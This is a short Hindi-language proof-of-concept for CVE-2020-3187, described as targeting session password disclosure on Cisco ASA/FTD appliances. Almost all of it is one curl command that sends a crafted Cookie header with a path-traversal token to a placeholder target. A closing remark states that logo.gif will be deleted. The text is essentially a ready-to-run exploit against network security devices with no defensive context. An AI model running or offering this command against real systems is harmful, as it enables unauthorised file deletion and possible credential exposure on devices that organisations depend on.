
CVE-2020-3187 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्राफ्टेड HTTP कुकी हेडर के माध्यम से Cisco ASA/FTD सत्र पासवर्ड प्रकटीकरण को लक्षित करता है।
curl -H "Cookie: token=. ./+CSOU+/csco_logo.gif" https://target.com/+CSCOE+/session_password.html
(logo.gif हटा दिया जाएगा)